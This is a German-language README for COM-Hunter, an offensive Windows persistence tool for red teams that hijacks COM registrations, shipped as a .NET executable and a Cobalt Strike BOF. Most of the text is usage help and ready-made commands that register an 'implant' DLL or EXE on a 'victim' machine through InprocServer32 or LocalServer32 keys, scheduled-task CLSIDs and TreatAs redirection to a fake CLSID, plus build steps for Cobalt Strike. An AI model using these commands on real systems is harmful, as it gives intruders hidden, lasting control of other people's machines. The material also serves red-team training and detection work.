
Windows COM-Hijacking-Persistenztool mit den Modi search, classic, Task Scheduler und TreatAs. Verfügbar als .NET-Executable und Cobalt Strike BOF für Red-Team-Operationen.
COM Hijacking VOODOO

COM-Hunter ist ein COM-Hijacking-Persistenztool.
Verfügbar sowohl in einer .NET-Version als auch in einer BOF-Variante, die vollständig mit Cobalt Strike kompatibel ist.
Die folgende Liste erklärt die verfügbaren Modi:
LocalServer32, InprocServer32 und Registrierungseinträgen unter sowohl HKLM als auch HKCU.LocalServer32 oder InprocServer32 durch.LocalServer32 oder InprocServer32 her.LocalServer32 oder InprocServer32 durch.LocalServer32, InprocServer32 und verwandten Registrierungseinträgen unter sowohl als auch basieren.ℹ️ Dieses Tool wurde ausgewählt und ist stolzer Teil des Cobalt Strike Community Kit.
Wenn Sie Fehler finden, zögern Sie nicht, sie zu melden. Ihr Feedback ist wertvoll, um die Qualität dieses Projekts zu verbessern!
Die Autoren und Mitwirkenden dieses Projekts haften nicht für die illegale Nutzung des Tools. Es ist ausschließlich für Bildungszwecke bestimmt. Die Benutzer sind für die Einhaltung der gesetzlichen Bestimmungen verantwortlich.
Dieses Projekt wurde mit ❤️ erstellt von @nickvourd && @S1ckB0y1337.
Besonderer Dank geht an meinen Freund Marios Gyftos für seine unschätzbare Hilfe während der Beta-Testphase dieses Tools.
Inspiriert vom RTO-Kurs von @zeropointsecltd.
BOF-Implementierung inspiriert von Lefteris Panos und seinem großartigen Projekt RegPersist.
Die Dateien base.c und bofdefs.h sind direkte Kopien aus dem Projekt TrustedSec's CS-Situational-Awareness-BOF.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ Suche nach DLL- und EXE-Implementierungen in HKLM und HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Suche nach EXE-Implementierungen in HKLM und HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Erweiterte Suche nach EXE-Implementierungen in HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Suche nach EXE- und DLL-Implementierungen in HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Klassische Persistenz mit DLL-Implementierung durchführen:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Klassische Persistenz mit EXE-Implementierung durchführen:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Persistenz über Taskplaner mit DLL-Implementierung durchführen:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Persistenz über den TreatAs-Registrierungsschlüssel und eine gefälschte (weiterleitbare) CLSID mit DLL-Implementierung durchführen:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ DLL-Implementierungspersistenz in HKCU entfernen mit:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ Erforderliche MinGW-w64-Toolchain (x86_64-w64-mingw32-gcc und i686-w64-mingw32-gcc)
ℹ️ Die BOF-Objekte für beide Architekturen kompilieren:
./make_all.sh
Dies wird:
com_hunter_*-Verzeichnisse erstellen.com_hunter_*.x64.o und com_hunter_*.x86.o kompilieren.com_hunter_*/-Verzeichnisse verschieben.ℹ️ Nach dem Kompilieren der BOF-Module einfach com_hunter_bof.cna in Cobalt Strike laden.
ℹ️ Um Build-Artefakte zu bereinigen, gehen Sie in jedes src-Verzeichnis und führen Sie aus:
make clean
HKLMHKCU